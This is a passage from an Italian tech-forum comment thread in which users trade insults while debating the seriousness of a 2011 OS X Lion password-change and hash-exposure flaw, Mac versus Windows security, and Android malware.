            Re: quindi per cambiare una password
            stavolta sei stato simpatico, sul serio :-D
          • hermanhesse scrive:
            Re: quindi per cambiare una password
            Ciao!Spero che questa volta converrai anche tu che Ruppolo sta andando oltre la soglia del fanboy!!!Cavoli, fino a prima che arrivasse lui la discussione era pacata e si parlava di come mettere a posto le cose.Arriva lui e via.... "il problema non esiste".Cavoli!
          • valerivs scrive:
            Re: quindi per cambiare una password
            si, nonostante io sia fanboy fino al midollo, devo ammettere che questa è una cappellata bella e buona.questo ovviamente non cambia la mia totale stima & fiducia verso Apple, ma bisogno ammettere che questa è una cappellata a va risolta.
          • hermanhesse scrive:
            Re: quindi per cambiare una password
            Grazie valerius.Hai un attestato di stima da parte mia. Quello che dico è che se hai a cuore un sistema (io ce li ho a cuore tutti...anche OS400... forse iOS un po' di meno ;) ) queste cose non sono da sottovalutare.
          • hermanhesse scrive:
            Re: quindi per cambiare una password
            Ma ROTFL!!!Panda, per un attimo mi hai fatto spaventare sai?
          • ruppolo scrive:
            Re: quindi per cambiare una password
            - Scritto da: hermanhesse
            Ma ROTFL!!!

            Panda, per un attimo mi hai fatto spaventare sai?Quindi non hai ancora capito che la tua pagina malevola non serve ad un tubo?
          • Tuo padre scrive:
            Re: quindi per cambiare una password
            Secondo me qui sei tu che non hai capito un tubazzo!Basta una applet signed per fare il lavoro sXXXXX.
          • ruppolo scrive:
            Re: quindi per cambiare una password
            - Scritto da: Tuo padre
            Secondo me qui sei tu che non hai capito un
            tubazzo!
            Basta una applet signed per fare il lavoro sXXXXX.E la fai "signare" da Steve Jobs in persona? Ah no, aspetta, potresti "signarla" con DigiNotar (rotfl)
          • hermanhesse scrive:
            Re: quindi per cambiare una password
            Ma non sai veramente un razzo!!!!(ROTFL)Oh+my -GOD *
          • ruppolo scrive:
            Re: quindi per cambiare una password
            - Scritto da: hermanhesse
            Ma non sai veramente un razzo!!!!
            (ROTFL)

            Oh+
            my -
            GOD *Un nuovo linguaggio?
          • gnammolo scrive:
            Re: quindi per cambiare una password
            ruppolo leggila così se ti fregano il mac ti fregano anche i dati COME SU WIN, nessuna superiorità da parte di apple
          • hermanhesse scrive:
            Re: quindi per cambiare una password
            Stai cercando di fargliela passare nella capa punto per punto?Poi glielo spieghi che gli cambiano la pwd da remoto con una Applet e che gli possono XXXXXXX gli hashes oppure ti fermi qui ? (ROTFL)
          • gnammolo scrive:
            Re: quindi per cambiare una password
            mi sa che ha già ordinato il suo solito bottiglione di maalox, stasera non dorme, penso passerà tutta la notte a postare cavolate/markette su pi
          • ruppolo scrive:
            Re: quindi per cambiare una password
            - Scritto da: gnammolo
            ruppolo leggila così se ti fregano il mac ti
            fregano anche i dati COME SU WIN, nessuna
            superiorità da parte di
            appleSe mi fregano il Mac mi inXXXXX per il Mac, non per i dati! Dei dati ho il backup.
          • sbrotfl scrive:
            Re: quindi per cambiare una password
            - Scritto da: ruppolo
            - Scritto da: gnammolo

            ruppolo leggila così se ti fregano il mac ti

            fregano anche i dati COME SU WIN, nessuna

            superiorità da parte di

            apple

            Se mi fregano il Mac mi inXXXXX per il Mac, non
            per i dati! Dei dati ho il
            backup.Di solito è il contrario... se ti fragano il mac te lo ricompri, se ti fregano numeri di telefono e dati sensibili IO mi incazzerei un po'... ma sono io che sono paranoico :(
          • gnammolo scrive:
            Re: quindi per cambiare una password
            bel senso della riservatezza consulente
          • Darwin scrive:
            Re: quindi per cambiare una password
            In questo caso non ne ha bisogno.
      • jaro scrive:
        Re: quindi per cambiare una password
        - Scritto da: gnammolo
        a dire il vero per cancellare una password si fa
        così anche su mac, basta un dvd con il system in
        usohttp://www.howtogeek.com/howto/30983/how-to-reset-your-forgotten-mac-os-x-password/Vedi Method Two. Mi sembra che non sia necessario alcun cd.
        • Gabriele scrive:
          Re: quindi per cambiare una password
          - Scritto da: jaro
          - Scritto da: gnammolo

          a dire il vero per cancellare una password
          si
          fa

          così anche su mac, basta un dvd con il
          system
          in

          uso

          http://www.howtogeek.com/howto/30983/how-to-reset-

          Vedi Method Two. Mi sembra che non sia necessario
          alcun
          cd.Vero, ma se hai attivato FileVault comunque non potrai leggere il disco se non hai la pw originale :)ciaoG.
    • Ego scrive:
      Re: quindi per cambiare una password
      - Scritto da: TheOriginalFanboy
      bisogna lasciare un mac incustodito con lion
      aperto e l'utente loggato, avere la sfiga che
      passi megaprogrammatorenerd che faccia partire
      uno script che ti cambi la
      password.

      b'è sempre meglio del cd autoavviante che
      cancella la pass di windows..
      no?

      ridiamo sempre delle sofrtune altrui ma poi...

      winari winari.. quando impararere..

      COMUNQUE in efetti non chiedere l'attuale
      password per cambiarla è una cacata pazzesca. giù
      a cupertino interverranno di
      sicuro.
      --------------------------------------------------
      Modificato dall' autore il 21 settembre 2011 08.55
      --------------------------------------------------la summa, il meglio della schiuma dei fanboys, colui che non sa e non capisce ma ne scrive, wow sono riuscito a trovare uno come ruppolo, pensavo fosse impossibile
    • ruppolo scrive:
      Re: quindi per cambiare una password
      - Scritto da: TheOriginalFanboy
      bisogna lasciare un mac incustodito con lion
      aperto e l'utente loggato, avere la sfiga che
      passi megaprogrammatorenerd che faccia partire
      uno script che ti cambi la
      password.Per agevolare la cosa direi di lasciare il mac incustodito su una panchina al parco. Vedrai come ti cambiano subito la "passworda"... (rotfl)(rotfl)(rotfl)

      b'è sempre meglio del cd autoavviante che
      cancella la pass di windows..
      no?Non tocchiamo uno dei capisaldi di Windows, eh?!!

      ridiamo sempre delle sofrtune altrui ma poi...

      winari winari.. quando impararere..Mai, ovviamente, altrimenti che winari sarebbero?
      COMUNQUE in efetti non chiedere l'attuale
      password per cambiarla è una cacata pazzesca. giù
      a cupertino interverranno di
      sicuro.Ovvio, sono raffreddori passeggeri.
      • Ego scrive:
        Re: quindi per cambiare una password
        ma anche su osx sta li da sempre usando il cdfai "ripristina password" dal menu "programma di installazione" sei un consulente informatico della apple, dovresti saperlo no?
        • ruppolo scrive:
          Re: quindi per cambiare una password
          - Scritto da: Ego
          ma anche su osx sta li da sempre usando il cdE sul PC che basta sfilare il coperchio, sfilare l'hard disk e portarlo via (10 secondi in tutto) cosa ne dici?

          fai "ripristina password" dal menu "programma di
          installazione"


          sei un consulente informatico della apple,
          dovresti saperlo
          no?Cero che lo, e allora? Quanto ci vuole a prendere un portatile e portarlo via?Quanto ci vuole a puntare la pistola alla tempia del responsabile IT e farsi consegnare tutte le password?Se vogliamo fare ipotesi, ne possiamo fare quante ne vogliamo, ma è tutta aria fritta.Le realtà sono ben altre. Ecco un esempio di realtà:http://www.radicalifvg.it/nimda.html
          • hermanhesse scrive:
            Re: quindi per cambiare una password
            - Scritto da: ruppolo
            - Scritto da: Ego

            ma anche su osx sta li da sempre usando il cd

            E sul PC che basta sfilare il coperchio, sfilare
            l'hard disk e portarlo via (10 secondi in tutto)
            cosa ne
            dici?10 secondi (ROTFL)...... MA LOOOOOOOOOL!




            fai "ripristina password" dal menu
            "programma
            di

            installazione"





            sei un consulente informatico della apple,

            dovresti saperlo

            no?

            Cero che lo, e allora? Quanto ci vuole a prendere
            un portatile e portarlo
            via?
            Quanto ci vuole a puntare la pistola alla tempia
            del responsabile IT e farsi consegnare tutte le
            password?Ma ti stai rendendo conto che una pistola alla tempia o rubare un portatile stanno su di un altro piano rispetto a cambiare la password oppure ti sei f*tt*t* il cervello??? (ROTFL)

            Se vogliamo fare ipotesi, ne possiamo fare quante
            ne vogliamo, ma è tutta aria
            fritta.
            Le realtà sono ben altre. Ecco un esempio di
            realtà:
            http://www.radicalifvg.it/nimda.htmlNimda!!!! Ah beh! Roba recente!(ROTFL)Il fatto che windows abbia dei virus non implica che questa cosa che tu reputi una sciocchezza non sia in realtà parecchio seria!
          • hermanhesse scrive:
            Re: quindi per cambiare una password
            Sei veramente messo male.
          • mcmcmcmcmc scrive:
            Re: quindi per cambiare una password
            - Scritto da: ruppolo

            Trovami qualcuno che abbia sfruttato tale falla e
            forniscimi dei dati sul sucXXXXX
            ottenuto.questa te la devi segnare per la prossima volta che si parla di pericolosissimo malaware Android!
          • ruppolo scrive:
            Re: quindi per cambiare una password
            - Scritto da: mcmcmcmcmc
            - Scritto da: ruppolo




            Trovami qualcuno che abbia sfruttato tale
            falla
            e

            forniscimi dei dati sul sucXXXXX

            ottenuto.

            questa te la devi segnare per la prossima volta
            che si parla di pericolosissimo malaware
            Android!Ricordati che prima di aver trovato ognuna delle varie app con malware finite nel Android Market, queste sono state scaricate un quarto di milione di volte dagli utenti.Quindi arrivi tardi, col tuo discorso.
          • mcmcmcmcmc scrive:
            Re: quindi per cambiare una password
            - Scritto da: ruppolo
            Ricordati Mo' me lo segno!
            Quindi arrivi tardi, col tuo discorso.Non conosco nessuno e non ho letto di nessuno che ha subito danni...Quindi, Trovami qualcuno che abbia sfruttato tale falla e forniscimi dei dati sul sucXXXXX ottenuto. (Cit.)
          • ruppolo scrive:
            Re: quindi per cambiare una password
            - Scritto da: mcmcmcmcmc
            - Scritto da: ruppolo


            Ricordati

            Mo' me lo segno!


            Quindi arrivi tardi, col tuo discorso.

            Non conosco nessuno e non ho letto di nessuno che
            ha subito
            danni...A milioni hanno subito danni, visto che il malware se lo sono beccati.
            Quindi, Trovami qualcuno che abbia sfruttato tale
            falla e forniscimi dei dati sul sucXXXXX
            ottenuto.
            (Cit.)Qualcuno?http://infinetnorthwest.com/Blog/android-malware-strikes/
          • mcmcmcmcmc scrive:
            Re: quindi per cambiare una password
            - Scritto da: ruppolo
            Qualcuno?
            http://infinetnorthwest.com/Blog/android-malware-sRipeto che non conosco nessuno e non ho letto di nessuno che ha subito danni...Quindi, Trovami qualcuno che abbia sfruttato tale falla e forniscimi dei dati sul sucXXXXX ottenuto. (Cit.)Dalla mia frase è abbastanza semplice capire che bisogna individuare il danno subito, a chi ha giovato, e come ne ha giovato.Quindi, Trovami qualcuno che abbia sfruttato tale falla e forniscimi dei dati sul sucXXXXX ottenuto. (Cit.)
          • hermanhesse scrive:
            Re: quindi per cambiare una password
            Secondo me mica lo ha ancora capito di chi è la citazione...
          • ruppolo scrive:
            Re: quindi per cambiare una password
            - Scritto da: hermanhesse
            Secondo me mica lo ha ancora capito di chi è la
            citazione...Sei sempre più patetico.
          • ruppolo scrive:
            Re: quindi per cambiare una password
            - Scritto da: mcmcmcmcmc
            - Scritto da: ruppolo


            Qualcuno?


            http://infinetnorthwest.com/Blog/android-malware-s

            Ripeto che non conosco nessuno e non ho letto di
            nessuno che ha subito
            danni...Una media di 250 mila utenti per singola app ha subito i danni dei malware poi ritirati dal market.
            Quindi, Trovami qualcuno che abbia sfruttato tale
            fallaQui ce ne sono 50:http://www.msnbc.msn.com/id/41867328/ns/technology_and_science-security/t/malware-infects-more-android-apps/#.TnnqDHPiRjESFRUTTATE.
            e forniscimi dei dati sul sucXXXXX
            ottenuto.
            (Cit.)250 mila download per app prima che fossero rimosse. Direi un buon sucXXXXX.
            Dalla mia frase è abbastanza semplice capire che
            bisogna individuare il danno subito, a chi ha
            giovato, e come ne ha
            giovato.Quando un malware arriva a destinazione, quello che doveva fare l'ha fatto.
            Quindi, Trovami qualcuno che abbia sfruttato tale
            falla e forniscimi dei dati sul sucXXXXX
            ottenuto.
            (Cit.)Fatto.
          • mcmcmcmcmc scrive:
            Re: quindi per cambiare una password
            E il danno dove è?E comunque, anche un bug quando c'è, c'è. E su tutte le installazioni! E il mio amico ne sa qualcosa!
            Quindi, Trovami qualcuno che abbia sfruttato tale
            falla e forniscimi dei dati sul sucXXXXX
            ottenuto.
            (Cit.)
          • ruppolo scrive:
            Re: quindi per cambiare una password
            - Scritto da: mcmcmcmcmc
            E il danno dove è?Lo sa l'autore del malware, è ciò che lui ha voluto.
            E comunque, anche un bug quando c'è, c'è. E su
            tutte le installazioni! E il mio amico ne sa
            qualcosa!Certo, ma un bug non è un malware.

            Quindi, Trovami qualcuno che abbia sfruttato
            tale

            falla e forniscimi dei dati sul sucXXXXX

            ottenuto.

            (Cit.)Già trovati sia gli autori che i colpiti. Intendi citare ancora per molto?
          • mcmcmcmcmc scrive:
            Re: quindi per cambiare una password
            se ti infastidisce smetto. Mi piace così tanto la frase, che mi dispiace smettere, ma posso provarci.Ma credo che tu non abbia nemmeno letto gli articoli che riporti.E il danno quale è? Negli articoli è chiaro.E ti devo dire la verità, ti rispondo perchè mi piaci. Seguo pi solo per leggere i tuoi commenti.
          • hermanhesse scrive:
            Re: quindi per cambiare una password
            Fatto cosa? (ROTFL)Cioè tu scrivi delle cose e queste magicamente puff compaiono? (ROTFL)
          • ruppolo scrive:
            Re: quindi per cambiare una password
            - Scritto da: hermanhesse
            Fatto cosa? (ROTFL)Quello che l'autore del malware ha desiderato.
            Cioè tu scrivi delle cose e queste magicamente
            puff compaiono?
            (ROTFL)Ah beh, questo dipende dalla fantasia dell'autore del malware.
          • hermanhesse scrive:
            Re: quindi per cambiare una password
            mai letta UNA SIMILE SEQUELA DI C A Z Z A T E !!!!Ma sparisci (ROTFL) !!!!
          • ruppolo scrive:
            Re: quindi per cambiare una password
            - Scritto da: hermanhesse
            mai letta UNA SIMILE SEQUELA DI C A Z Z A T E
            !!!!
            Ma sparisci (ROTFL) !!!!EPIC FAIL.
          • hermanhesse scrive:
            Re: quindi per cambiare una password
            Ruppolo stuxnet cosa colpiva?Dai, forza, che ce la fai!
          • ruppolo scrive:
            Re: quindi per cambiare una password
            - Scritto da: hermanhesse
            Ruppolo stuxnet cosa colpiva?

            Dai, forza, che ce la fai!Il tuo fondoschiena?
          • hermanhesse scrive:
            Re: quindi per cambiare una password
            Non confonderlo con Apple e con il TUO fondoschiena... cosa colpiva i sistemi S... dai forza!!!
          • mcmcmcmcmc scrive:
            Re: quindi per cambiare una password

            Trovami qualcuno che abbia sfruttato tale falla e forniscimi dei dati sul sucXXXXX ottenuto.Ho appena parlato con un mio amico. Ha lasciato il mac incustodito sul tavolo di un bar (gli era venuto di andare in bagno), con un faretto thunderbolt per mostrare meglio la nuova creatura.Quando è tornato aveva la password cambiata! C'era un foglietto con le nuove credenziali. Quando ha acceso non c'era più iosx lion installato, ma un banalissimo windows! Ha dovuto lasciare il mac con lo schermo spento per non fare brutta figura.Stava pensando di chiedere i danni esistenziali alla Apple, poi ha rinsavito e ha pensato di comperare un nuovo mac.
          • aracosta scrive:
            Re: quindi per cambiare una password
            - Scritto da: Funz
            - Scritto da: ruppolo


            Apertura del fianco 3 secondi, stacco dei

            connettori SATA 3 secondi, estrazione del
            disco
            3

            secondi. In effetti si può fare anche in
            meno
            di

            10

            secondi.

            OK, dimostri di non aver mai aperto un computer
            in vita tua: altro che esperto di
            informatica!
            3 secondi per aprire il fianco? Se hai due viti
            mai più, nemmeno se sono quelle apribili senza
            cacciavite.
            Estrazione del disco 3 secondi? Se hai 4 viti
            sognatelo! Ti tocca aprire pure l'altro
            fianco!

            Se invece ti riferivi al macintoy (non so com'è
            fatto dentro), bella roba!
            :p
            Dai su.... su un Dell se sai dove mettere le mani ce la puo fare in quei tempi, ma ti devi allenare bene, così poi ti assumono come assemblatore capo. :)(troll)
          • Funz scrive:
            Re: quindi per cambiare una password
            - Scritto da: aracosta
            - Scritto da: Funz

            - Scritto da: ruppolo




            Apertura del fianco 3 secondi, stacco
            dei


            connettori SATA 3 secondi, estrazione
            del

            disco

            3


            secondi. In effetti si può fare anche in

            meno

            di


            10


            secondi.



            OK, dimostri di non aver mai aperto un
            computer

            in vita tua: altro che esperto di

            informatica!

            3 secondi per aprire il fianco? Se hai due
            viti

            mai più, nemmeno se sono quelle apribili
            senza

            cacciavite.

            Estrazione del disco 3 secondi? Se hai 4 viti

            sognatelo! Ti tocca aprire pure l'altro

            fianco!



            Se invece ti riferivi al macintoy (non so
            com'è

            fatto dentro), bella roba!

            :p


            Dai su.... su un Dell se sai dove mettere le mani
            ce la puo fare in quei tempi, ma ti devi allenare
            bene, così poi ti assumono come assemblatore
            capo.
            :)(troll)vacci tu a fare le gare coi cinesi dai ditini piccoli e che si accontentano di una ciotola di riso in bianco :p
          • panda rossa scrive:
            Re: quindi per cambiare una password
            - Scritto da: ruppolo
            - Scritto da: Ego

            ma anche su osx sta li da sempre usando il cd

            E sul PC che basta sfilare il coperchio, sfilare
            l'hard disk e portarlo via (10 secondi in tutto)
            cosa ne
            dici?Dico che la cantina e' chiusa a chiave.Quindi c'e' poco da sfilare.
          • ruppolo scrive:
            Re: quindi per cambiare una password
            - Scritto da: panda rossa
            - Scritto da: ruppolo

            - Scritto da: Ego


            ma anche su osx sta li da sempre usando
            il
            cd



            E sul PC che basta sfilare il coperchio,
            sfilare

            l'hard disk e portarlo via (10 secondi in
            tutto)

            cosa ne

            dici?

            Dico che la cantina e' chiusa a chiave.
            Quindi c'e' poco da sfilare.Invece le case degli altri e le aziende sono aperte, libero ingresso, incustodito, giusto?
          • panda rossa scrive:
            Re: quindi per cambiare una password
            - Scritto da: ruppolo
            - Scritto da: panda rossa

            - Scritto da: ruppolo


            - Scritto da: Ego



            ma anche su osx sta li da sempre
            usando

            il

            cd





            E sul PC che basta sfilare il coperchio,

            sfilare


            l'hard disk e portarlo via (10 secondi
            in

            tutto)


            cosa ne


            dici?



            Dico che la cantina e' chiusa a chiave.

            Quindi c'e' poco da sfilare.

            Invece le case degli altri e le aziende sono
            aperte, libero ingresso, incustodito,
            giusto?ruppolo, stai equiparando il furto con effrazione alla giusta punizione per idiozia.oppure adesso verrai a dire che e' molto piu' grave punire un idiota che forzare la porta di una cantina per sottrarre il disco da un server.
          • ruppolo scrive:
            Re: quindi per cambiare una password
            Ma di che parli?
          • hermanhesse scrive:
            Re: quindi per cambiare una password
            Del fatto che ti manca qualche giovedì, credo.
          • Ego scrive:
            Re: quindi per cambiare una password
            - Scritto da: ruppolo
            - Scritto da: Ego

            ma anche su osx sta li da sempre usando il cd

            E sul PC che basta sfilare il coperchio, sfilare
            l'hard disk e portarlo via (10 secondi in tutto)
            cosa ne
            dici?dico che in mezz'ora stai ancora a guardare stordito il case, sarebbe la prima volta in vita tua che apri un computer




            fai "ripristina password" dal menu
            "programma
            di

            installazione"





            sei un consulente informatico della apple,

            dovresti saperlo

            no?

            Cero che lo, e allora? Quanto ci vuole a prendere
            un portatile e portarlo
            via?cosa c'entra il portare via un portatile col fatto che su osx cambi pass col cd di installazione?
            Quanto ci vuole a puntare la pistola alla tempia
            del responsabile IT e farsi consegnare tutte le
            password?sicuramente piu che entrare in una pagina web e trovarsi con la password cambiata

            Se vogliamo fare ipotesi, ne possiamo fare quante
            ne vogliamo, ma è tutta aria
            fritta.
            Le realtà sono ben altre. Ecco un esempio di
            realtà:
            http://www.radicalifvg.it/nimda.htmlruppolo, tu vivi nel recinto apple da sempre, non conosci una mazza di informatica e parli di realtà? sii serio
      • ruppolo scrive:
        Re: quindi per cambiare una password
        - Scritto da: hermanhesse
        ma grazie a Lion non serve, ora basta una pagina
        web
        (ROTFL)Bene, mettine una online, così vediamo se ha sucXXXXX. Dai...
        Solo se l'utente è amministratore della macchina.Lo è sempre.
        Mentre qui stiamo parlando di un qualunque asino
        che può rubarti l'hashes delle pwd da
        remoto!!!!!!!!!!AHAHHAHAHAHA!!! dai, ruba la mia!

        Certo che sei 0 forte!!Certo che sei un trollone!
        Quando è uscito XP c'era già OSX...Wikipedia dice il contrario:http://en.wikipedia.org/wiki/Windows_xp <i
        First released to computer manufacturers on August 24, 2001 </i
        http://en.wikipedia.org/wiki/Mac_os_x#Version_10.0:_.22Cheetah.22 <i
        On March 24, 2001, Apple released Mac OS X v10.0 </i
        Colgo l'occasione per far notare che la maggioranza degli utenti sono rimasti al sistema del 2001 (rotfl)
        vuoi che ti
        leggo le vulnerabilità che aveva OSX all'epoca...
        tipo l'implementazione ad cazzum di Samba, per
        esempio...No, non mi devi leggere delle vulnerabilità, ma delle vulnerabilità SFRUTTATE. Non piani di rapina in banca, ma rapine in banca effettuate. Forza...
        Si, spara, spara fesserie... magari gli utonti
        Macachi possono darti retta, qualunque persona
        che sa come stanno le cose non può che ridere di
        te (ROTFL)
        !!!A corto di argomenti?
        • panda rossa scrive:
          Re: quindi per cambiare una password
          - Scritto da: ruppolo
          Colgo l'occasione per far notare che la
          maggioranza degli utenti sono rimasti al sistema
          del 2001
          (rotfl)Chiediamoci perche', invece di riderci sopra.
          • ruppolo scrive:
            Re: quindi per cambiare una password
            - Scritto da: panda rossa
            - Scritto da: ruppolo


            Colgo l'occasione per far notare che la

            maggioranza degli utenti sono rimasti al
            sistema

            del 2001

            (rotfl)

            Chiediamoci perche', invece di riderci sopra.Perché le versioni successive fanno XXXXXX, ovviamente.
          • hermanhesse scrive:
            Re: quindi per cambiare una password
            Eh sì... invece Lion sì che è solido come una roccia e non da problemi!http://www.google.it/search?gcx=w&sourceid=chrome&ie=UTF-8&q=Lion+osx+problems
          • ruppolo scrive:
            Re: quindi per cambiare una password
            - Scritto da: hermanhesse
            Eh sì... invece Lion sì che è solido come una
            roccia e non da
            problemi!

            http://www.google.it/search?gcx=w&sourceid=chrome&12.500.000 risultati.Prova con questo:http://www.google.it/search?q=windows%2Bproblem&ie=UTF-8&oe=UTF-8684.000.000 risultati.
          • hermanhesse scrive:
            Re: quindi per cambiare una password
            Peccato che ha
            80% del mercato e che ha avuto
            90% di mercato.Peccato eh... senti gli specchi che rumore! Brrrr! La puoi smettere di renderti ridicolo?
          • ruppolo scrive:
            Re: quindi per cambiare una password
            - Scritto da: hermanhesse
            Peccato che ha
            80% del mercato e che ha avuto

            90% di
            mercato.Appunto, peccato.

            Peccato eh... senti gli specchi che rumore!
            Brrrr! La puoi smettere di renderti
            ridicolo?Anche Berlusconi ha avuto la maggioranza...
          • hermanhesse scrive:
            Re: quindi per cambiare una password
            ??? la smetti di cambiare discorso?
          • ruppolo scrive:
            Re: quindi per cambiare una password
            - Scritto da: hermanhesse
            ???
            la smetti di cambiare discorso?E chi sta cambiando discorso?Il punto è che tu credi sia un vantaggio avere il 90% del mercato.
          • hermanhesse scrive:
            Re: quindi per cambiare una password
            Stiamo parlando di questo:http://www.defenceindepth.net/2011/09/cracking-os-x-lion-passwords.htmlSmettila di sviare il discorso.
          • logicamente non loggato scrive:
            Re: quindi per cambiare una password
            - Scritto da: ruppolo
            Il punto è che tu credi sia un vantaggio avere il
            90% del
            mercato.Mmm... il punto è che l'ultima versione di OSX ha una falla GRAVE nella gestione delle password, sfruttabile DA REMOTO. Poi si può parlare del cav., di Xp o di quello che si vuole, ma sembra proprio l'atteggiamento di chi ha poco da dire sul merito e cerca di buttarla in caciara.
          • Darwin scrive:
            Re: quindi per cambiare una password
            Aspetta....oltre a questo, c'è ancora il bug di LDAP che permette l'autenticazione senza passwordhttp://www.fratellogeek.com/os-x-lion-apple-non-ha-ancora-risolto-il-bug-ldap/
          • Prozac scrive:
            Re: quindi per cambiare una password
            - Scritto da: ruppolo
            Prova con questo:
            http://www.google.it/search?q=windows%2Bproblem&ie

            684.000.000 risultati.Ma tu imbrogli!Scusa... devi fare lo stesso tipo di ricerca ;)Vediamo cosa succede paragonando l'ultimo Windows in commercio:[img]http://img28.imageshack.us/img28/8507/w7p.png[/img]con l'ultimo OS X in commercio:[img]http://img851.imageshack.us/img851/7793/67098007.png[/img]Se noti ho utilizzato il metodo scientifico: il test l'ho eseguito scrivendo tra doppi apici i nomi dei due sistemi operativi :)
        • hermanhesse scrive:
          Re: quindi per cambiare una password
          Che bella arrampicata complimenti!Il fatto è che:http://www.defenceindepth.net/2011/09/cracking-os-x-lion-passwords.htmlE fine: non è aiutandoti dicendo con "anche gli altri" o "gli altri peggio" che il baco scompare. Scomparirà con un aggiornamento... che però non sta arrivando!Voglio solo risponderti alla domanda "metti su una pagina web e vediamo, dai..."http://tinyurl.com/65um5tqL'hai guardata? Ora che sarebbe sucXXXXX se in quella pagina ci fosse stato l'exploit invece di una constatazione dei fatti?
          • ruppolo scrive:
            Re: quindi per cambiare una password
            - Scritto da: hermanhesse
            Che bella arrampicata complimenti!

            Il fatto è che:

            http://www.defenceindepth.net/2011/09/cracking-os-


            E fine: non è aiutandoti dicendo con "anche gli
            altri" o "gli altri peggio" che il baco scompare.
            Scomparirà con un aggiornamento... che però non
            sta
            arrivando!


            Voglio solo risponderti alla domanda "metti su
            una pagina web e vediamo,
            dai..."

            http://tinyurl.com/65um5tq

            L'hai guardata? Ora che sarebbe sucXXXXX se in
            quella pagina ci fosse stato l'exploit invece di
            una constatazione dei
            fatti?E cosa ti fa pensare che tra i miliardi di pagine io apra proprio quella? La pubblicizzi su Canale 5?
          • hermanhesse scrive:
            Re: quindi per cambiare una password
            La linko qui su PI in un post e tu la guardi come hai appena fatto!O credi che sia difficile?Oppure te la posto via email.Ruppolo, diavolo, ma puoi per una volta essere serio e dire "questo è grave" come hanno fatto... vediamo... tutti???
          • gnammolo scrive:
            Re: quindi per cambiare una password
            persino bertuccia lo ha ammesso!
          • hermanhesse scrive:
            Re: quindi per cambiare una password
            Infatti, ma perchè comunque Bertuccia sarà un fanboy ma almeno si rende conto di quando una cosa è grave e soprattutto LEGGE e si INFORMA.Mentre un certo sig. R.R. qui postante credo abbia perso l'abitudine di farlo da... vediamo... 30 anni?
          • ruppolo scrive:
            Re: quindi per cambiare una password
            - Scritto da: hermanhesse
            La linko qui su PI in un post e tu la guardi come
            hai appena
            fatto!
            O credi che sia difficile?Facilissimo, il difficile è convincermi ad aprirla. Prova con un attacco "social engineering", dai. Prova a dirmi che c'è la foto di Steve Jobs...

            Oppure te la posto via email.E mi dici che ho vinto 10 milioni? Oppure mi dici che il mio account su poste.it è scaduto?
            Ruppolo, diavolo, ma puoi per una volta essere
            serio e dire "questo è grave" come hanno fatto...
            vediamo...
            tutti???BALLE. Io vedo che la maggior parte della gente non riesce a riprodurre questo bug. Chissà perché...
          • hermanhesse scrive:
            Re: quindi per cambiare una password
            - Scritto da: ruppolo
            - Scritto da: hermanhesse

            La linko qui su PI in un post e tu la guardi
            come

            hai appena

            fatto!

            O credi che sia difficile?

            Facilissimo, il difficile è convincermi ad
            aprirla. Prova con un attacco "social
            engineering", dai. Prova a dirmi che c'è la foto
            di Steve
            Jobs...Prima hai postato un mio link.Quindi lo hai aperto.Se l'exploit fosse stato li dentro come sarebbe finita?




            Oppure te la posto via email.

            E mi dici che ho vinto 10 milioni? Oppure mi dici
            che il mio account su poste.it è
            scaduto?Ma tu credi che sia difficile?Vado sul tuo profilo facebook, contatto un tuo amico, ne copio le abitudini e mi invento una email credibile, con una scusa ti faccio aprire il link (un tinyurl) e tu sei fregato!Sveglia Ruppolo, ho fatto questo di lavoro, e per tanti anni (dalla parte dei buoni, ecco perchè ti dico che sminuire è da folli!)


            Ruppolo, diavolo, ma puoi per una volta
            essere

            serio e dire "questo è grave" come hanno
            fatto...

            vediamo...

            tutti???

            BALLE. Io vedo che la maggior parte della gente
            non riesce a riprodurre questo bug. Chissà
            perché...Veramente qui è da 20 giorni che l'abbiamo riprodotto.
          • ruppolo scrive:
            Re: quindi per cambiare una password
            - Scritto da: hermanhesse
            - Scritto da: ruppolo

            - Scritto da: hermanhesse


            La linko qui su PI in un post e tu la
            guardi

            come


            hai appena


            fatto!


            O credi che sia difficile?



            Facilissimo, il difficile è convincermi ad

            aprirla. Prova con un attacco "social

            engineering", dai. Prova a dirmi che c'è la
            foto

            di Steve

            Jobs...

            Prima hai postato un mio link.
            Quindi lo hai aperto.
            Se l'exploit fosse stato li dentro come sarebbe
            finita?Prima di aprire il link ho guardato dove conduceva, Safari lo mostra nella parte bassa del browser.







            Oppure te la posto via email.



            E mi dici che ho vinto 10 milioni? Oppure mi
            dici

            che il mio account su poste.it è

            scaduto?

            Ma tu credi che sia difficile?Certo.
            Vado sul tuo profilo facebook, contatto un tuo
            amico, ne copio le abitudini e mi invento una
            email credibile, con una scusa ti faccio aprire
            il link (un tinyurl) e tu sei
            fregato!Non apro mai i link di tinyurl, men che meno se sono in una email.
            Sveglia Ruppolo, ho fatto questo di lavoro, e per
            tanti anni (dalla parte dei buoni, ecco perchè ti
            dico che sminuire è da
            folli!)Cosa avresti fatto tu di lavoro?





            Ruppolo, diavolo, ma puoi per una volta

            essere


            serio e dire "questo è grave" come hanno

            fatto...


            vediamo...


            tutti???



            BALLE. Io vedo che la maggior parte della
            gente

            non riesce a riprodurre questo bug. Chissà

            perché...

            Veramente qui è da 20 giorni che l'abbiamo
            riprodotto.Bravi, e ora vi arriva il premio?
          • hermanhesse scrive:
            Re: quindi per cambiare una password
            - Scritto da: ruppolo
            - Scritto da: hermanhesse

            - Scritto da: ruppolo


            - Scritto da: hermanhesse



            La linko qui su PI in un post e tu
            la

            guardi


            come



            hai appena



            fatto!



            O credi che sia difficile?





            Facilissimo, il difficile è convincermi
            ad


            aprirla. Prova con un attacco "social


            engineering", dai. Prova a dirmi che
            c'è
            la

            foto


            di Steve


            Jobs...



            Prima hai postato un mio link.

            Quindi lo hai aperto.

            Se l'exploit fosse stato li dentro come
            sarebbe

            finita?

            Prima di aprire il link ho guardato dove
            conduceva, Safari lo mostra nella parte bassa del
            browser.Ma secondo te la pagina che apri ha scritto sopra "SEI STATO CONTAMINATO!!!!!" in grassetto?(ROTFL) Tu sei convinto che mac sia sicuro perchè non ti sei reso conto di quante volte ti hanno già infilato (ROTFL)











            Oppure te la posto via email.





            E mi dici che ho vinto 10 milioni?
            Oppure
            mi

            dici


            che il mio account su poste.it è


            scaduto?



            Ma tu credi che sia difficile?

            Certo.Tu sicuramente non ne sei in grado.


            Vado sul tuo profilo facebook, contatto un
            tuo

            amico, ne copio le abitudini e mi invento una

            email credibile, con una scusa ti faccio
            aprire

            il link (un tinyurl) e tu sei

            fregato!

            Non apro mai i link di tinyurl, men che meno se
            sono in una
